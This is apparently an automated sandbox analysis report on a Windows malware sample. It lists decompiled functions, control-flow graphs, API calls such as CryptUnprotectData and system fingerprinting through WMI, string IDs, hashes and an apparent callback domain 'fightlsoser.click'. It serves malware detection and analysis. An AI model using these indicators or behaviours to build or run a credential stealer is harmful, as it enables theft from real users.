14045->14101 14047 423781 GetLogicalDrives 14048 43d6c0 LdrInitializeThunk 14047->14048 14048->14045 14049->14050 14050->14045 14050->14047 14050->14051 14051->14016 14055 423aa0 14052->14055 14053 423cf7 14053->14018 14055->14053 14056 423c0f 14055->14056 14123 43dfb0 14055->14123 14119 41eeb0 14056->14119 14059 423d3e 14058->14059 14135 43dbd0 14059->14135 14061 43dfb0 3 API calls 14063 423ba0 14061->14063 14062 423cf7 14062->14020 14063->14061 14063->14062 14064 423c0f 14063->14064 14065 41eeb0 3 API calls 14064->14065 14065->14062 14067 425947 14066->14067 14068 425b80 14066->14068 14069 40ec2b 14066->14069 14076 425bc5 14066->14076 14067->14068 14067->14069 14070 43dfb0 3 API calls 14067->14070 14074 43dbd0 LdrInitializeThunk 14067->14074 14067->14076 14140 43b420 14068->14140 14078 426170 14069->14078 14070->14067 14072 43dbd0 LdrInitializeThunk 14072->14076 14074->14067 14076->14069 14076->14072 14077 43b480 LdrInitializeThunk 14076->14077 14149 43dcf0 14076->14149 14159 43e690 14076->14159 14077->14076 14079 426190 14078->14079 14081 4261ee 14079->14081 14173 43b480 LdrInitializeThunk 14079->14173 14080 40ec34 14088 426500 14080->14088 14081->14080 14083 439b40 RtlAllocateHeap 14081->14083 14085 426298 14083->14085 14084 439b60 RtlFreeHeap 14084->14080 14087 42630e 14085->14087 14174 43b480 LdrInitializeThunk 14085->14174 14087->14084 14087->14087 14175 426520 14088->14175 14102 43d520 LdrInitializeThunk 14101->14102 14103 421630 14102->14103 14104 439b40 RtlAllocateHeap 14103->14104 14112 42163c 14103->14112 14105 421674 14104->14105 14114 42172f 14105->14114 14116 43b480 LdrInitializeThunk 14105->14116 14107 439b60 RtlFreeHeap 14109 421d38 14107->14109 14108 439b40 RtlAllocateHeap 14108->14114 14109->14112 14118 43b480 LdrInitializeThunk 14109->14118 14111 421d28 14111->14107 14112->14051 14114->14108 14114->14111 14115 439b60 RtlFreeHeap 14114->14115 14117 43b480 LdrInitializeThunk 14114->14117 14115->14114 14116->14105 14117->14114 14118->14109 14120 41eee0 14119->14120 14120->14120 14121 4215f0 3 API calls 14120->14121 14122 41ef24 14121->14122 14122->14053 14124 43dfd0 14123->14124 14125 43e01e 14124->14125 14133 43b480 LdrInitializeThunk 14124->14133 14127 439b40 RtlAllocateHeap 14125->14127 14130 43e2ac 14125->14130 14129 43e09c 14127->14129 14128 439b60 RtlFreeHeap 14128->14130 14132 43e10e 14129->14132 14134 43b480 LdrInitializeThunk 14129->14134 14130->14055 14132->14128 14133->14125 14134->14132 14136 43dbf0 14135->14136 14138 43dcbf 14136->14138 14139 43b480 LdrInitializeThunk 14136->14139 14138->14063 14139->14138 14141 43b465 14140->14141 14142 43b45a 14140->14142 14143 43b438 14140->14143 14144 43b446 14140->14144 14146 439b60 RtlFreeHeap 14141->14146 14145 439b40 RtlAllocateHeap 14142->14145 14143->14141 14143->14144 14147 43b44b RtlReAllocateHeap 14144->14147 14148 43b460 14145->14148 14146->14148 14147->14148 14148->14076 14150 43dd10 14149->14150 14151 43dd5e 14150->14151 14169 43b480 LdrInitializeThunk 14150->14169 14152 43df9c 14151->14152 14154 439b40 RtlAllocateHeap 14151->14154 14152->14076 14156 43ddf1 14154->14156 14155 439b60 RtlFreeHeap 14155->14152 14158 43de6f 14156->14158 14170 43b480 LdrInitializeThunk 14156->14170 14158->14155 14160 43e69f 14159->14160 14162 43e7ee 14160->14162 14171 43b480 LdrInitializeThunk 14160->14171 14161 43ea97 14161->14076 14162->14161 14163 439b40 RtlAllocateHeap 14162->14163 14165 43e883 14163->14165 14168 43e93e 14165->14168 14172 43b480 LdrInitializeThunk 14165->14172 14166 439b60 RtlFreeHeap 14166->14161 14168->14166 14168->14168 14169->14151 14170->14158 14171->14162 14172->14168 14173->14081 14174->14087 14176 426560 14175->14176 14176->14176 14183 439b90 14176->14183 14180 426696 14182 4265c3 14182->14180 14197 43a3f0 14182->14197 14184 439bc0 14183->14184 14185 439c2e 14184->14185 14205 43b480 LdrInitializeThunk 14184->14205 14186 439b40 RtlAllocateHeap 14185->14186 14190 4265b7 14185->14190 14188 439cb0 14186->14188 14192 439d3e 14188->14192 14206 43b480 LdrInitializeThunk 14188->14206 14189 439b60 RtlFreeHeap 14189->14190 14193 439e30 14190->14193 14192->14189 14194 439f0e 14193->14194 14195 439e42 14193->14195 14194->14182 14195->14194 14207 43b480 LdrInitializeThunk 14195->14207 14198 43a440 14197->14198 14204 43a4ae 14198->14204 14208 43b480 LdrInitializeThunk 14198->14208 14199 43abfe 14199->14182 14201 43ab7a 14201->14199 14209 43b480 LdrInitializeThunk 14201->14209 14203 43b480 LdrInitializeThunk 14203->14204 14204->14199 14204->14201 14204->14203 14204->14204 14205->14185 14206->14192 14207->14194 14208->14204 14209->14199 14210 416b7e 14212 416b90 14210->14212 14211 416d37 CryptUnprotectData 14213 416d56 14211->14213 14212->14211 14214 40d6ff 14215 40d760 14214->14215 14217 40d7ae 14215->14217 14218 43b480 LdrInitializeThunk 14215->14218 14218->14217

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 00431BB0 Relevance: 71.9, APIs: 2, Strings: 39, Instructions: 179COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 0 431bb0-431c9c GetSystemMetrics * 2 6 431ca3-432087 0->6
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                                                                                                                                  • String ID: $ [D$([D$0[D$8[D$@[D$HZD$H[D$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PMD$PZD$P[D$XZD$X[D$`ZD$hZD$pZD$xZD$ZD$ZD
                                                                                                                                                                                                                                                  • API String ID: 4116985748-735401729
                                                                                                                                                                                                                                                  • Opcode ID: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                                                                                                                                                                                                  • Instruction ID: ea45c71986b2e534ecec44a4126f62931ddcc8577b73b097e58ed3aa899a90b6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41B16FB04097818FE771DF14D48879BBBE0BBC5308F508A2EE5E89B251CBB95448CF86
                                                                                                                                                                                                                                                  Function 00436F90 Relevance: 35.6, APIs: 11, Strings: 9, Instructions: 571memorycomCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 9 436f90-436fb8 10 436fc0-437006 9->10 10->10 11 437008-43701f 10->11 12 437020-43705b 11->12 12->12 13 43705d-43709a 12->13 14 4370a0-4370b2 13->14 14->14 15 4370b4-4370cd 14->15 17 4370d7-4370e2 15->17 18 4370cf 15->18 19 4370f0-437122 17->19 18->17 19->19 20 437124-43717b CoCreateInstance 19->20 21 437181-4371b2 20->21 22 437526-437556 call 43ce00 GetVolumeInformationW 20->22 24 4371c0-4371d4 21->24 27 437560-437562 22->27 28 437558-43755c 22->28 24->24 25 4371d6-437200 SysAllocString 24->25 31 437516-437522 SysFreeString 25->31 32 437206-437220 CoSetProxyBlanket 25->32 30 437587-43758e 27->30 28->27 33 437590-437597 30->33 34 4375a7-4375bf 30->34 31->22 36 437226-43723a 32->36 37 43750c-437512 32->37 33->34 38 437599-4375a5 33->38 35 4375c0-4375d4 34->35 35->35 39 4375d6-43760f 35->39 40 437240-437261 36->40 37->31 38->34 41 437610-437650 39->41 40->40 42 437263-4372e3 SysAllocString 40->42 41->41 43 437652-43767f call 41dc20 41->43 44 4372f0-437313 42->44 48 437680-437688 43->48 44->44 46 437315-43733e SysAllocString 44->46 51 437344-437366 46->51 52 4374fa-43750a SysFreeString * 2 46->52 48->48 50 43768a-43768c 48->50 53 437692-4376a2 call 408070 50->53 54 437570-437581 50->54 59 4374f0-4374f6 51->59 60 43736c-43736f 51->60 52->37 53->54 54->30 56 4376a7-4376ae 54->56 59->52 60->59 61 437375-43737a 60->61 61->59 62 437380-4373c8 VariantInit 61->62 63 4373d0-4373e4 62->63 63->63 64 4373e6-4373f4 63->64 65 4373f8-4373fa 64->65 66 437400-437406 65->66 67 4374df-4374ec VariantClear 65->67 66->67 68 43740c-43741a 66->68 67->59 69 437467 68->69 70 43741c-437421 68->70 71 437469-4374a2 call 407ff0 call 408e90 69->71 72 437446-43744a 70->72 83 4374a4 71->83 84 4374a9-4374b1 71->84 74 437430-437438 72->74 75 43744c-437455 72->75 77 43743b-437444 74->77 78 437457-43745a 75->78 79 43745c-437460 75->79 77->71 77->72 78->77 79->77 81 437462-437465 79->81 81->77 83->84 85 4374b3 84->85 86 4374b8-4374db call 408020 call 408000 84->86 85->86 86->67
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00437173
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(D080DE8F), ref: 004371DB
                                                                                                                                                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437218
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(9F4F9D4B), ref: 00437268
                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(E8D216C6), ref: 0043731A
                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(.'()), ref: 00437385
                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(.'()), ref: 004374E0
                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00437504
                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0043750A
                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00437517
                                                                                                                                                                                                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00437552
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                                  • String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
                                                                                                                                                                                                                                                  • API String ID: 2573436264-264043890
                                                                                                                                                                                                                                                  • Opcode ID: 95e57cc096cba7a840fd92396d64f49f34505b8d03b2982346d1668a3fdb9a31
                                                                                                                                                                                                                                                  • Instruction ID: 06fb3ad9466451430b31427f45de08a7eb0daa23bec53a4f5f9458ad790f981b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95e57cc096cba7a840fd92396d64f49f34505b8d03b2982346d1668a3fdb9a31
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D302F0B1A083009FD320CF64CC81B5BBBE5EB99314F14982DF6C59B3A1D679E805CB96
                                                                                                                                                                                                                                                  Function 0040E2A9 Relevance: 14.0, APIs: 2, Strings: 7, Instructions: 529COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 214 40e2a9-40e2d1 call 4097b0 CoUninitialize 217 40e2e0-40e2f4 214->217 217->217 218 40e2f6-40e307 217->218 219 40e310-40e331 218->219 219->219 220 40e333-40e38e 219->220 221 40e390-40e3aa 220->221 221->221 222 40e3ac-40e3bd 221->222 223 40e3db-40e3e3 222->223 224 40e3bf-40e3cf 222->224 226 40e3e5-40e3e6 223->226 227 40e3fb-40e405 223->227 225 40e3d0-40e3d9 224->225 225->223 225->225 230 40e3f0-40e3f9 226->230 228 40e407-40e40b 227->228 229 40e41b-40e423 227->229 231 40e410-40e419 228->231 232 40e425-40e426 229->232 233 40e43b-40e445 229->233 230->227 230->230 231->229 231->231 234 40e430-40e439 232->234 235 40e447-40e44b 233->235 236 40e45b-40e467 233->236 234->233 234->234 237 40e450-40e459 235->237 238 40e481-40e5b7 236->238 239 40e469-40e46b 236->239 237->236 237->237 241 40e5c0-40e5d8 238->241 240 40e470-40e47d 239->240 240->240 242 40e47f 240->242 241->241 243 40e5da-40e5fb 241->243 242->238 244 40e600-40e628 243->244 244->244 245 40e62a-40e68f call 40b6a0 call 4097b0 CoUninitialize 244->245 250 40e690-40e6a4 245->250 250->250 251 40e6a6-40e6b8 250->251 252 40e6c0-40e6e1 251->252 252->252 253 40e6e3-40e73e 252->253 254 40e740-40e75a 253->254 254->254 255 40e75c-40e76d 254->255 256 40e77b-40e783 255->256 257 40e76f 255->257 259 40e785-40e786 256->259 260 40e79b-40e7a5 256->260 258 40e770-40e779 257->258 258->256 258->258 261 40e790-40e799 259->261 262 40e7a7-40e7ab 260->262 263 40e7bb-40e7c3 260->263 261->260 261->261 264 40e7b0-40e7b9 262->264 265 40e7c5-40e7c6 263->265 266 40e7db-40e7e5 263->266 264->263 264->264 267 40e7d0-40e7d9 265->267 268 40e7e7-40e7eb 266->268 269 40e7fb-40e807 266->269 267->266 267->267 270 40e7f0-40e7f9 268->270 271 40e821-40e948 269->271 272 40e809-40e80b 269->272 270->269 270->270 274 40e950-40e96a 271->274 273 40e810-40e81d 272->273 273->273 276 40e81f 273->276 274->274 275 40e96c-40e98f 274->275 277 40e990-40e9b9 275->277 276->271 277->277 278 40e9bb-40e9e2 call 40b6a0 277->278 280 40e9e7-40e9fd 278->280
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Uninitialize
                                                                                                                                                                                                                                                  • String ID: "# `$,$I~$`~$fightlsoser.click$qx$s
                                                                                                                                                                                                                                                  • API String ID: 3861434553-2312874698
                                                                                                                                                                                                                                                  • Opcode ID: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                                                                                                                                                                                                  • Instruction ID: 550626b1aa1881637dc35d229a9c1637f44e71d1f63aa888f187a22684203b49
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2902B0B010C3D18BD3358F2684A07EBBFE1EF92304F189DADD4DA6B252D679040A8B57
                                                                                                                                                                                                                                                  Function 004233A0 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 471COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 281 4233a0-4233ef 282 4233f0-423402 281->282 282->282 283 423404-423445 282->283 285 423450-42347c 283->285 285->285 286 42347e-423488 285->286 287 423610-42361d 286->287 288 423600-423607 286->288 289 4234c6 286->289 290 4234d7-4234e3 286->290 291 4234e4-4234f5 286->291 292 4237d5-42387f 286->292 293 4237ba 286->293 294 4237a8-4237b2 286->294 295 4234ce-4234d4 call 408000 286->295 296 42348f-423495 286->296 299 423626 287->299 300 42361f-423624 287->300 288->287 289->295 297 4234f7-4234fc 291->297 298 4234fe 291->298 303 423880-42389c 292->303 294->293 295->290 301 423497-42349c 296->301 302 42349e 296->302 305 423500-423537 call 407ff0 297->305 298->305 306 42362d-4236d9 call 407ff0 299->306 300->306 307 4234a1-4234bf call 407ff0 301->307 302->307 303->303 308 42389e-4238ae call 4215f0 303->308 318 423540-423585 305->318 319 4236e0-423724 306->319 307->287 307->288 307->289 307->290 307->291 307->292 307->293 307->294 307->295 314 4238b3-4238b6 308->314 320 4238be-4238db 314->320 318->318 321 423587-42358f 318->321 319->319 322 423726-42372e 319->322 324 4238e0-423904 320->324 325 4235b1-4235bd 321->325 326 423591-423596 321->326 327 423730-423737 322->327 328 423751-423761 322->328 324->324 329 423906-423989 324->329 331 4235e1-4235ec call 43d6c0 325->331 332 4235bf-4235c3 325->332 330 4235a0-4235af 326->330 333 423740-42374f 327->333 334 423763-423767 328->334 335 423781-4237a1 GetLogicalDrives call 43d6c0 328->335 337 423990-4239be 329->337 330->325 330->330 341 4235f1-4235f9 331->341 338 4235d0-4235df 332->338 333->328 333->333 340 423770-42377f 334->340 335->290 335->293 335->294 335->295 335->320 344 4237c0-4237c6 call 408000 335->344 345 4239f1-4239f7 call 408000 335->345 346 4239eb 335->346 347 4237cf 335->347 337->337 343 4239c0-4239e3 call 421270 337->343 338->331 338->338 340->335 340->340 341->287 341->288 341->292 341->293 341->294 341->320 341->344 343->346 344->347 346->345 347->292
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: #R,T$$^<P$VW$]~"p$ij$KM
                                                                                                                                                                                                                                                  • API String ID: 0-788320361
                                                                                                                                                                                                                                                  • Opcode ID: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                                                                                                                                                                                                  • Instruction ID: 9ed236048ece28067beed024fb633757567cd4a7e3bca11c75bb2a7735f0e68b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1F1CAB46083509FD310DF65E88262BBBF1EFD5304F44892DE4958B351EB789A06CB4B
                                                                                                                                                                                                                                                  Function 0040A960 Relevance: 9.2, Strings: 7, Instructions: 401COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 354 40a960-40a989 355 40a990-40a9e5 354->355 355->355 356 40a9e7-40aadf 355->356 357 40aae0-40ab1b 356->357 357->357 358 40ab1d-40ab39 357->358 359 40ab40-40ab69 358->359 359->359 360 40ab6b-40ab7a call 40b6a0 359->360 362 40ab7f-40ab86 360->362 363 40ae29-40ae32 362->363 364 40ab8c-40ab98 362->364 365 40aba0-40abb2 364->365 365->365 366 40abb4-40abb9 365->366 367 40abc0-40abcc 366->367 368 40abd3-40abe4 367->368 369 40abce-40abd1 367->369 370 40ae20-40ae26 call 439b60 368->370 371 40abea-40abff 368->371 369->367 369->368 370->363 372 40ac00-40ac41 371->372 372->372 374 40ac43-40ac50 372->374 376 40ac52-40ac58 374->376 377 40ac84-40ac88 374->377 380 40ac67-40ac6b 376->380 378 40ae1e 377->378 379 40ac8e-40acb6 377->379 378->370 381 40acc0-40acf4 379->381 380->378 382 40ac71-40ac78 380->382 381->381 383 40acf6-40acff 381->383 384 40ac7a-40ac7c 382->384 385 40ac7e 382->385 388 40ad01-40ad0b 383->388 389 40ad34-40ad36 383->389 384->385 386 40ac60-40ac65 385->386 387 40ac80-40ac82 385->387 386->377 386->380 387->386 390 40ad17-40ad1b 388->390 389->378 391 40ad3c-40ad52 389->391 390->378 392 40ad21-40ad28 390->392 393 40ad60-40adb2 391->393 394 40ad2a-40ad2c 392->394 395 40ad2e 392->395 393->393 396 40adb4-40adbe 393->396 394->395 399 40ad10-40ad15 395->399 400 40ad30-40ad32 395->400 397 40adc0-40adc8 396->397 398 40adf4-40adf8 396->398 401 40add7-40addb 397->401 402 40adfe-40ae1c call 40a6d0 398->402 399->389 399->390 400->399 401->378 403 40addd-40ade4 401->403 402->370 405 40ade6-40ade8 403->405 406 40adea-40adec 403->406 405->406 408 40add0-40add5 406->408 409 40adee-40adf2 406->409 408->401 410 40adfa-40adfc 408->410 409->408 410->378 410->402
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
                                                                                                                                                                                                                                                  • API String ID: 0-490458541
                                                                                                                                                                                                                                                  • Opcode ID: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                                                                                                                                                                                                  • Instruction ID: 966b8f91f76bb20883ed88500b6b89ab0c93423946d56f050922860fedc986fe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7C1267260C3504BC714CF6488905AFBBD3ABC2304F1E893DE9D56B382D679991AC78B
                                                                                                                                                                                                                                                  Function 0040CE55 Relevance: 9.0, Strings: 7, Instructions: 275COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 411 40ce55-40ce62 412 40ce70-40ce9b 411->412 412->412 413 40ce9d-40ced5 call 408720 call 436f90 412->413 418 40cee0-40cf06 413->418 418->418 419 40cf08-40cf6b 418->419 420 40cf70-40cfa7 419->420 420->420 421 40cfa9-40cfba 420->421 422 40cfc0-40cfcb 421->422 423 40d03d 421->423 424 40cfd0-40cfd9 422->424 425 40d041-40d049 423->425 424->424 426 40cfdb 424->426 427 40d05b-40d068 425->427 428 40d04b-40d04f 425->428 426->425 429 40d06a-40d071 427->429 430 40d08b-40d093 427->430 431 40d050-40d059 428->431 432 40d080-40d089 429->432 433 40d095-40d096 430->433 434 40d0ab-40d1c6 430->434 431->427 431->431 432->430 432->432 435 40d0a0-40d0a9 433->435 436 40d1d0-40d215 434->436 435->434 435->435 436->436 437 40d217-40d239 436->437 438 40d240-40d250 437->438 438->438 439 40d252-40d27f call 40b6a0 438->439 441 40d284-40d29e 439->441
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 6AB8C0C3488F994123D904AF30EFEBBC$F^$I@$N~ :$VgfW$fightlsoser.click$z@(
                                                                                                                                                                                                                                                  • API String ID: 0-220970398
                                                                                                                                                                                                                                                  • Opcode ID: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                                                                                                                                                                                                  • Instruction ID: b1d760c26d9b90ec4573806c6615211f8657e28aa76e89aec63d6860f5017e85
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A191EEB05083C18BD335CF25D8A0BEBBBE0AB96314F148D6DD4DD9B282D738454ACB96
                                                                                                                                                                                                                                                  Function 004087F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127threadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 442 4087f0-4087fe call 43afd0 445 408804-40880b call 434680 442->445 446 408979-40897b ExitProcess 442->446 449 408811-408849 GetCurrentProcessId GetCurrentThreadId 445->449 450 408974 call 43b400 445->450 452 408851-4088d6 GetForegroundWindow 449->452 453 40884b-40884f 449->453 450->446 454 408950-408968 call 409cc0 452->454 455 4088d8-40894e 452->455 453->452 454->450 458 40896a call 40cdf0 454->458 455->454 460 40896f call 40b670 458->460 460->450
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
